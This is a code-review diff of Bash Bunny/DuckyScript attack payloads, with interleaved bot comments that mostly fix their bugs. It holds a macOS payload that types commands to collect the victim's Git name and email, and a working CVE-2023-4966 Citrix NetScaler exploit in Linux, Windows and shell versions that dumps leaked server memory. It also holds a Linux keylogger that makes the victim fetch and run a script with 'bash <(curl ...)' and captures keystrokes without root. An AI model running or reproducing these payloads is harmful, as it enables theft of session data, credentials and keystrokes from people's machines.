# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Exfiltration
|
||||||
|
# Attackmodes: HID STORAGE
|
||||||
|
# Target OS: OSX
|
||||||
|
# Dependency: OSX Extensions
|
||||||
|
#
|
||||||
|
# Magenta solid Setup
|
||||||
|
# Yellow single blink Attack in progress
|
||||||
|
# Yellow double blink Sync
|
||||||
|
# Yellow triple blink Cleanup
|
||||||
|
# Green blink then solid Finished
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
|
||||||
|
|
||||||
|
OSX TERMINAL OPEN
|
||||||
|
|
||||||
|
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'touch $lootPath'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
# Get the user name from the Git global config
|
||||||
|
Q STRING 'user_name=$(git config --global user.name)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
# Get the user email from the Git global config
|
||||||
|
Q STRING 'user_email=$(git config --global user.email)'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
# Sync
|
||||||
|
LED STAGE 2
|
||||||
|
sync
|
||||||
|
|
||||||
|
# Cleanup
|
||||||
|
LED STAGE 3
|
||||||
|
|
||||||
|
# Eject
|
||||||
|
QUACK STRING 'diskutil eject $last_mounted_volume'
|
||||||
|
QUACK ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
OSX TERMINAL CLOSE
|
||||||
|
|
||||||
|
LED FINISH
|
|
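Review bot: `LED STAGE 2` (L4734) and `LED STAGE 3` (L4749) are written with a space, while the rest of this commit uses the joined form `LED STAGE2` (L4008); if the LED helper does not accept the spaced form, the Sync and Cleanup states documented in the header (L4619, L4623) will not show the yellow double/triple blink. Use `LED STAGE2` and `LED STAGE3`. The eject step switches from the `Q` alias used everywhere else in the file to `QUACK` (L4760, L4764); either works, but one form per file reads better.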
@ -0,0 +1,193 @@
|
||||||
|
# Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966
|
||||||
|
|
||||||
|
This payload sends an HTTP request to a remote server using the `curl` command. If the request succeeds, it means the exploit was successful. Conversely, if the request fails, it indicates that the target has resisted the attack.
|
||||||
|
|
||||||
|
This payload is a Proof of Concept (POC) based on DuckyScript and is intended for use only in authorized penetration testing. CVE-2023-4966 [[1](#sources)] has been resolved, and I have decided to release this payload only now to minimize the risk of it being used inappropriately. Please use this payload exclusively when you are fully aware of what you are doing and have obtained explicit authorization from the target.
|
||||||
|
|
||||||
|
**Category**: incident-response
|
||||||
|
|
||||||
|
## Index
|
||||||
|
|
||||||
|
- [Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](#exploit-citrix-netscaler-adc-and-gateway-through-cve-2023-4966)
|
||||||
|
- [CVE-2023-4966](#cve-2023-4966)
|
||||||
|
- [Summary](#summary)
|
||||||
|
- [Impacted Products](#impacted-products)
|
||||||
|
- [Settings](#settings)
|
||||||
|
- [DuckyScript Extensions Used](#duckyScript-extensions-used)
|
||||||
|
- [Payload Description Windows](#payload-description-windows)
|
||||||
|
- [Payload Description Linux](#payload-description-linux)
|
||||||
|
- [Script.sh](#script-sh)
|
||||||
|
- [Sources](#sources)
|
||||||
|
- [Credits](#credits)
|
||||||
|
|
||||||
|
## CVE-2023-4966
|
||||||
|
|
||||||
|
Multiple vulnerabilities have been discovered in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway).
|
||||||
|
|
||||||
|
### Summary
|
||||||
|
|
||||||
|
NetScaler ADC and NetScaler Gateway contain unauthenticated buffer-related vulnerabilities mentioned below
|
||||||
|
|
||||||
|
### Impacted Products
|
||||||
|
|
||||||
|
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
|
||||||
|
|
||||||
|
- NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
|
||||||
|
- NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
|
||||||
|
- NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
|
||||||
|
- NetScaler ADC 13.1-FIPS before 13.1-37.164
|
||||||
|
- NetScaler ADC 12.1-FIPS before 12.1-55.300
|
||||||
|
- NetScaler ADC 12.1-NDcPP before 12.1-55.300
|
||||||
|
|
||||||
|
***Note**: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.*
|
||||||
|
|
||||||
|
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
|
||||||
|
|
||||||
|
![](https://i.ibb.co/x7SRvGf/1.png)
|
||||||
|
|
||||||
|
***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
|
||||||
|
|
||||||
|
## Settings
|
||||||
|
|
||||||
|
The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.
|
||||||
|
|
||||||
|
```plaintext
|
||||||
|
HOSTNAME='192.168.1.200'
|
||||||
|
...
|
||||||
|
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Payload Description Windows
|
||||||
|
|
||||||
|
In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$header_value = 'a' * 24576
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, all newline characters ("\n") are removed from the string stored in `$header_value`. This is done to ensure that the string doesn't contain any line break characters.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$header_value = $header_value -replace "\n", ""
|
||||||
|
```
|
||||||
|
|
||||||
|
A variable `$headers` is created, which holds an HTTP header formatted as a string. This header will be used in the subsequent HTTP request.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$headers = "-H 'Host:$header_value'"
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, a variable `$headers` is created as a hashtable containing the HTTP header. In this case, only the "Host" header is used, with the value from `$header_value`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$headers = @{ 'Host' = $header_value }
|
||||||
|
```
|
||||||
|
|
||||||
|
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
|
||||||
|
```
|
||||||
|
|
||||||
|
This `if` statement checks if the first three characters of the HTTP response in the `$response` variable are equal to "200," indicating a successful HTTP response.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
if ($response.Substring(0, 3) -eq "200")
|
||||||
|
```
|
||||||
|
|
||||||
|
If the preceding condition is true, some messages are printed to indicate the beginning of the output.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Write-Host "--- Dumped memory ---"
|
||||||
|
$response.Substring(131050)
|
||||||
|
Write-Host "--- End ---"
|
||||||
|
```
|
||||||
|
|
||||||
|
If the initial condition of the `if` statement is not met, a message is printed, indicating that the machine is not vulnerable.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Write-Host "Could not dump memory"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Payload Description Linux
|
||||||
|
|
||||||
|
This line sets the `header_value` variable to a string containing 24,576 'a' characters. It uses the `yes` command to repeatedly output 'a' and `head` to limit it to 24,576 lines. The `tr` command is used to remove any newline characters, resulting in a long string of 'a's.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||||
|
```
|
||||||
|
|
||||||
|
Here, the `headers` variable is constructed with the `-H` option for the cURL command. It sets the 'Host' header to the previously generated `header_value`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
headers="-H 'Host:$header_value'"
|
||||||
|
```
|
||||||
|
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||||
|
```
|
||||||
|
|
||||||
|
In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||||
|
echo "--- Dumped memory ---"
|
||||||
|
echo "$response" | cut -c 131051-
|
||||||
|
echo "The $HOSTNAME is vulnerable!"
|
||||||
|
echo "--- End ---"
|
||||||
|
else
|
||||||
|
echo "Could not dump memory"
|
||||||
|
fi
|
||||||
|
```
|
||||||
|
|
||||||
|
## Script sh
|
||||||
|
|
||||||
|
The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
|
||||||
|
|
||||||
|
Example Execution:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
./script.sh 192.168.1.200
|
||||||
|
```
|
||||||
|
|
||||||
|
Before running the script, you might need to grant execute permissions to the file, as mentioned. You can do this with the following command:
|
||||||
|
|
||||||
|
```shell
|
||||||
|
sudo chmod +x script.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
After assigning execute permissions, the above command allows the user to run the script without having to specify the sh command before the script's name.
|
||||||
|
|
||||||
|
## Sources
|
||||||
|
|
||||||
|
1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
|
||||||
|
2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center">Aleff</h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,48 @@
|
||||||
|
#################################################################################
|
||||||
|
# #
|
||||||
|
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : incident-response #
|
||||||
|
# Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||||
|
# #
|
||||||
|
#################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
QUACK REM VARIABLES
|
||||||
|
# 1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
|
||||||
|
HOSTNAME='192.168.1.200'
|
||||||
|
|
||||||
|
QUACK DELAY 3000
|
||||||
|
QUACK CTRL-ALT t
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING header_value=\$(yes a | head -n 24576 | tr -d '\n')
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING headers=\"-H 'Host:\$header_value'\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING response=\$(curl -s -k -H \"\$headers\" \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\" --connect-timeout 10)
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING if [ \$? -eq 0 ] && [ \"\$(echo \$response | cut -c 1-3)\" == \"200\" ]; then
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"--- Dumped memory ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"\$response\" | cut -c 131051-
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"--- End ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING else
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING echo \"Could not dump memory\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING fi
|
||||||
|
QUACK ENTER
|
|
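Review bot: The header at L5531 reads `Target : Citrix NetScaler ADV; NetScaler Gateway`, but the product is NetScaler ADC as the title line (L5515) and the README say; the same typo is at L5789 in the Windows payload. The configuration comment at L5557, `# 1) Define replacing into the HOSTNAME var your target, so put here ...`, is hard to parse; `# 1) Set HOSTNAME to the target Citrix ADC / Gateway address (IP or host name), without the protocol.` says the same thing, and L5815 should match. `Category : incident-response` (L5527) is a surprising label for an exploit proof-of-concept; if that is the repository's convention for verification payloads, a one-line note saying so would help.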
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
HOSTNAME="$1" # first parameter
|
||||||
|
|
||||||
|
header_value=$(yes a | head -n 24576 | tr -d '\n')
|
||||||
|
|
||||||
|
headers="-H 'Host:$header_value'"
|
||||||
|
|
||||||
|
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
|
||||||
|
|
||||||
|
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
|
||||||
|
echo "--- Dumped memory ---"
|
||||||
|
echo "$response" | cut -c 131051-
|
||||||
|
echo "--- End ---"
|
||||||
|
else
|
||||||
|
echo "Could not dump memory"
|
||||||
|
fi
|
|
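Review bot: The README in this commit describes script.sh as also printing `echo "The $HOSTNAME is vulnerable!"` (L5311) after the dump, but the script (L5738–L5746) has no such line — one of the two should change so the documentation matches the code. The script also does no argument check: run without a parameter, `HOSTNAME` (L5706) is empty and the request goes to `https:///oauth/...`; a guard such as `[ -n "$1" ] || { echo "usage: $0 <host>" >&2; exit 1; }` right after the shebang gives a clear error instead. `HOSTNAME` is also the shell's own variable for the local machine name; the assignment works, but a name like `TARGET_HOST` would avoid the confusion.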
@ -0,0 +1,57 @@
|
||||||
|
##################################################################################
|
||||||
|
# #
|
||||||
|
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : incident-response #
|
||||||
|
# Target : Citrix NetScaler ADV; NetScaler Gateway #
|
||||||
|
# #
|
||||||
|
##################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
QUACK REM VARIABLES
|
||||||
|
#1) Define replacing into the HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
|
||||||
|
HOSTNAME='192.168.1.200'
|
||||||
|
|
||||||
|
QUACK DELAY 1500
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING powershell
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING \$header_value = 'a' * 24576
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$header_value = \$header_value -replace \"\n\", \"\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$headers=\"-H 'Host:\$header_value'\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$headers = @{'Host' = \$header_value}
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$response = Invoke-RestMethod -Uri \$uri -Headers \$headers -Method GET -TimeoutSec 10
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING if (\$response.Substring(0, 3) -eq \"200\") {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Write-Host \"--- Dumped memory ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING \$response.Substring(131050) # 131051 - 1
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Write-Host \"--- End ---\"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING } else {
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING Write-Host \"Could not dump memory\"}
|
||||||
|
QUACK ENTER
|
|
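Review bot: `$headers=\"-H 'Host:\$header_value'\"` (L5874) is dead code — the variable is overwritten by the hashtable at L5886 before it is used at L5910, and a curl-style `-H` string has no meaning to `Invoke-RestMethod`. Remove L5874–L5882 (the string, its ENTER and DELAY); the README paragraph that documents that line (L5056–L5071) goes with it. The trailing `# 131051 - 1` at L5946 is typed into the PowerShell session as part of the command; it is harmless there, but it reads better as a `#` comment on its own line in payload.txt above the QUACK. The header at L5789 has the same `ADV` typo as the Linux payload.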
@ -0,0 +1,20 @@
|
||||||
|
#/bin/bash
|
||||||
|
checkonbunny() {
|
||||||
|
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
|
||||||
|
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
|
||||||
|
if [ -d $mybunny ]; then
|
||||||
|
bashbunnyloot=$mybunny"/loot"
|
||||||
|
mapfile=$bashbunnyloot"/maps"
|
||||||
|
keyfile=$bashbunnyloot"/keys"
|
||||||
|
startwork
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
startwork(){
|
||||||
|
getdevicetouse=${getdevicetouse#"id="}
|
||||||
|
xinput --test $getdevicetouse > $keyfile &
|
||||||
|
xmodmap -pke > $mapfile
|
||||||
|
}
|
||||||
|
BunnyID="ch000001"
|
||||||
|
bashbunnyloot=''
|
||||||
|
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
|
||||||
|
[[ -z $getdevicetouse ]] || checkonbunny
|
|
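Review bot: The shebang at L5993 is `#/bin/bash`, missing the `!`; it should be `#!/bin/bash` (the defect is masked because the script is fed to bash via `bash <(curl …)` at L6245). The expansions at L6001, L6005 and L6009 are unquoted: `[ -d $mybunny ]` with an empty `$mybunny` becomes the one-argument test `[ -d ]`, which is true, so the script carries on with `bashbunnyloot=/loot` instead of stopping. Quote them — `grep "$BunnyID"`, `findmnt "$mybunny"`, `[ -d "$mybunny" ]` — so an unresolved device fails the test. `checkonbunny` calls `startwork` before it is defined textually; that works in bash because lookup happens at call time, but a short comment would save the next reader checking.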
@ -0,0 +1,28 @@
|
||||||
|
# Keylogger For Bash Bunny
|
||||||
|
|
||||||
|
Author: TheDragonkeeper
|
||||||
|
|
||||||
|
Version: Version 1
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
|
||||||
|
|
||||||
|
Captures all keyboard input without the need for root access
|
||||||
|
Uses the user keyboard map file for decoding the captured data
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ---------------- | ----------------------------------------------------------------------------- |
|
||||||
|
| Blue flash | Booting |
|
||||||
|
| Red slow | Waiting on webserver |
|
||||||
|
| Blue Fast | Identifying Target and deploying accordingly |
|
||||||
|
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
|
||||||
|
| LED Red Fast | Decoding keys, Then doing any cleanup required |
|
||||||
|
| Green flashing | Task complete, ready to unplug |
|
||||||
|
|
||||||
|
Still WIP, Currently supports linux (tested on ubuntu)
|
||||||
|
If you want to add payloads for OSX or Windows place them into the switch folder then,
|
||||||
|
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
TARGET_OS='LINUX'
|
||||||
|
|
||||||
|
LED B 100
|
||||||
|
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||||
|
sleep 3
|
||||||
|
LED R SLOW
|
||||||
|
GET HOST_IP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
udisk mount
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
python webserver.py &
|
||||||
|
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
|
||||||
|
LED B FAST
|
||||||
|
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
|
||||||
|
LED
|
||||||
|
WAIT
|
||||||
|
LED R 0
|
||||||
|
cd /root/udisk/loot
|
||||||
|
keystate=''
|
||||||
|
_ctrl='0'
|
||||||
|
_alt='0'
|
||||||
|
_shift='0'
|
||||||
|
for line in $(cat 'keys')
|
||||||
|
do
|
||||||
|
if [ $line != 'key' ]; then
|
||||||
|
if [ $line == 'press' ] || [ $line == 'release' ]; then
|
||||||
|
keystate=$line
|
||||||
|
else
|
||||||
|
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
|
||||||
|
searchparams='keycode'"$_spaces"$line
|
||||||
|
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
|
||||||
|
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
|
||||||
|
LED G 0
|
|
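Review bot: The readiness loop at L6225 has no sleep and requests `/index.html`, a path webserver.py never serves (it only answers for `.sh` files, L6395); the loop exits because the 404 error body makes `$(curl …)` non-empty, not because the server is ready, and until then it spins curl as fast as it can. Poll the file that is actually fetched later, with a status check and a pause: `while ! curl -sf "$HOST_IP:8080/Linux.sh" >/dev/null; do sleep 1; done`. `tr ' ' ' '` at L6305 replaces a space with a space and can be dropped. The `RUN WIN add windows payload` / `RUN OSX add osx payload` placeholders (L6237, L6241, L6336, L6340) would be typed literally into a target when `TARGET_OS` resolves to those values; the README marks them WIP, but a comment on those lines saying so would prevent an accidental run.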
@ -0,0 +1,28 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||||
|
from os import curdir, sep
|
||||||
|
PORT_NUMBER = 8080
|
||||||
|
class myHandler(BaseHTTPRequestHandler):
|
||||||
|
def do_GET(self):
|
||||||
|
if self.path=="/":
|
||||||
|
self.path="/"
|
||||||
|
try:
|
||||||
|
sendReply = False
|
||||||
|
if self.path.endswith(".sh"):
|
||||||
|
mimetype='text/plain'
|
||||||
|
sendReply = True
|
||||||
|
if sendReply == True:
|
||||||
|
f = open(curdir + sep + self.path)
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header('Content-type',mimetype)
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write(f.read())
|
||||||
|
f.close()
|
||||||
|
return
|
||||||
|
except IOError:
|
||||||
|
self.send_error(404,'File Not Found: %s' % self.path)
|
||||||
|
try:
|
||||||
|
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
|
||||||
|
server.serve_forever()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
server.socket.close()
|
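Review bot: `do_GET` builds the file path straight from the request (`curdir + sep + self.path`, L6411) and filters only on the `.sh` suffix (L6395), so a path with `..` segments reads any `.sh` file outside the payload directory, and since the server listens on all interfaces (L6451) the host at the other end of the link can do this. Resolve the path with `os.path.realpath` and reject anything outside the base directory; a request that is not a `.sh` file currently gets no response at all (L6391–L6435 fall through), so answer 404 there as well, and read the file inside `with` so the handle is closed on error. The `if self.path=="/": self.path="/"` branch (L6379–L6383) is a no-op and can go. The rewrite below needs `import os` next to the existing `from os import curdir, sep` (L6363).
```python
BASE_DIR = os.path.realpath(curdir)

class myHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Resolve inside BASE_DIR and refuse anything that escapes it;
        # only *.sh files are served, everything else is a 404.
        target = os.path.realpath(os.path.join(BASE_DIR, self.path.lstrip("/")))
        if not target.startswith(BASE_DIR + sep) or not target.endswith(".sh"):
            self.send_error(404, 'File Not Found: %s' % self.path)
            return
        try:
            with open(target, 'rb') as f:
                data = f.read()
        except IOError:
            self.send_error(404, 'File Not Found: %s' % self.path)
            return
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(data)
# … unchanged: server start-up …
```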